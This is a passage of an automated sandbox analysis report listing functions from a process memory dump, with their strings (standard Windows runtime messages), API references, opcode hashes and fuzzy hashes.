                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$[$]:%u
                                                                                  • API String ID: 48624451-2819853543
                                                                                  • Opcode ID: 52567c78f74250a21566b0cdb505fe527569cfd3ecc5b428cb4f594d7f48c5b0
                                                                                  • Instruction ID: ad8fc672e18209812dc6963488ce7fecc131ea2e2de996826a1dcc40c73b3e7c
                                                                                  • Opcode Fuzzy Hash: 52567c78f74250a21566b0cdb505fe527569cfd3ecc5b428cb4f594d7f48c5b0
                                                                                  • Instruction Fuzzy Hash: F5213376E0011AABEB11DF79DD44ABEB7E9EF54788F54011AEE05D3240EB30D9018BA1
                                                                                  Function 02F3F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Re-Waiting, xrefs: 02F8031E
                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F802E7
                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F802BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                  • API String ID: 0-2474120054
                                                                                  • Opcode ID: 80eaffb3734863246ad47290815aea3047869aafba2a3255230022e4d9624041
                                                                                  • Instruction ID: d0f9b90882d367999ec47440b837a576ad296aabde66e22530cffdbafbfc012d
                                                                                  • Opcode Fuzzy Hash: 80eaffb3734863246ad47290815aea3047869aafba2a3255230022e4d9624041
                                                                                  • Instruction Fuzzy Hash: C6E1C231A087419FD726DF28C884B2AB7E1BF45394F140B5DF6A5876E1DB74D848CB42
                                                                                  Function 02F4BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02F87B7F
                                                                                  • RTL: Resource at %p, xrefs: 02F87B8E
                                                                                  • RTL: Re-Waiting, xrefs: 02F87BAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 0-871070163
                                                                                  • Opcode ID: 5ab5dc50ad5e6593878a0239f92981f8cbedf0696a2f1157f96abfa6d6d4797a
                                                                                  • Instruction ID: 54cdd2f88943f2e4cf21a7cce4f16d7046f542785d659f53344e749821d33299
                                                                                  • Opcode Fuzzy Hash: 5ab5dc50ad5e6593878a0239f92981f8cbedf0696a2f1157f96abfa6d6d4797a
                                                                                  • Instruction Fuzzy Hash: E941C235B047029BD720DE25CC40B6ABBE6EF84764F100A1DEA5ADB681DB71E8058F91
                                                                                  Function 02F4B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F8728C
                                                                                  Strings
                                                                                  • RTL: Resource at %p, xrefs: 02F872A3
                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02F87294
                                                                                  • RTL: Re-Waiting, xrefs: 02F872C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                  • API String ID: 885266447-605551621
                                                                                  • Opcode ID: 41018b40a02fe489b098f9887c6b722994080ecf5e1c7a98a442f0f80b52f990
                                                                                  • Instruction ID: a6992aef7ed6df55e3a64a9950fea60fa255a32f556da44e1204da7a488e36de
                                                                                  • Opcode Fuzzy Hash: 41018b40a02fe489b098f9887c6b722994080ecf5e1c7a98a442f0f80b52f990
                                                                                  • Instruction Fuzzy Hash: D8412536B00202ABEB10EE24CC41B66F7A5FF44798F200618FB55E7680DB70E841CBD1
                                                                                  Function 02FC2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: %%%u$]:%u
                                                                                  • API String ID: 48624451-3050659472
                                                                                  • Opcode ID: 9f71f6d08b5dec51c8c0a9ad91ba4ec4ce156410b726e8c6fe947714826a9cba
                                                                                  • Instruction ID: 4fc9726bd0c0575e29c33dd2d7414129b18f898311b548a021988a71105add98
                                                                                  • Opcode Fuzzy Hash: 9f71f6d08b5dec51c8c0a9ad91ba4ec4ce156410b726e8c6fe947714826a9cba
                                                                                  • Instruction Fuzzy Hash: 14315472A002199FDB20DE29CD40BEE77F9EB44694F54459AED49E3240EB30DA549FA0
                                                                                  Function 02F57D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aulldvrm
                                                                                  • String ID: +$-
                                                                                  • API String ID: 1302938615-2137968064
                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction ID: 9bf4906adc59d21698b72805b98c1f8c96e96108cbb3285bc83e5dd813f7dc5f
                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                  • Instruction Fuzzy Hash: 9391C571E002269BDF24EE69C8807BEF7E5AF447A4F14461AEF55E72C0D7308981CB90
                                                                                  Function 02F19126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $$@
                                                                                  • API String ID: 0-1194432280
                                                                                  • Opcode ID: 39f706265e019ca9aba421d1a0ac6382b154df68fdc14337b77d4a4c9d159b67
                                                                                  • Instruction ID: 0627b99ecfa7539baf96110b5f14406ff60597f5bd04148281253706cbfd38cd
                                                                                  • Opcode Fuzzy Hash: 39f706265e019ca9aba421d1a0ac6382b154df68fdc14337b77d4a4c9d159b67
                                                                                  • Instruction Fuzzy Hash: 9C811B72D002699BDB25DF54CC54BEEB7B5AF08794F4041EAEA19B7280D7709E84CFA0
                                                                                  Function 02F9CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 02F9CFBD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3864892962.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                  • Associated: 00000005.00000002.3864892962.0000000003009000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000300D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.3864892962.000000000307E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_2ee0000_find.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallFilterFunc@8
                                                                                  • String ID: @$@4Qw@4Qw
                                                                                  • API String ID: 4062629308-2383119779
                                                                                  • Opcode ID: fd4c7d1cb0e22dc3abb10f030b9345f30c32357689ae2dbc619a5e52b9ceb1d0
                                                                                  • Instruction ID: c9d729c9137a98e0e568b68fac5ccc79c62d9dae4e9b7323fee1d8457fd2230c
                                                                                  • Opcode Fuzzy Hash: fd4c7d1cb0e22dc3abb10f030b9345f30c32357689ae2dbc619a5e52b9ceb1d0
                                                                                  • Instruction Fuzzy Hash: C041AD75900228DFEB21EFA5C840A6EBBB9EF49B84F10406AEB15DB264D735D805CB61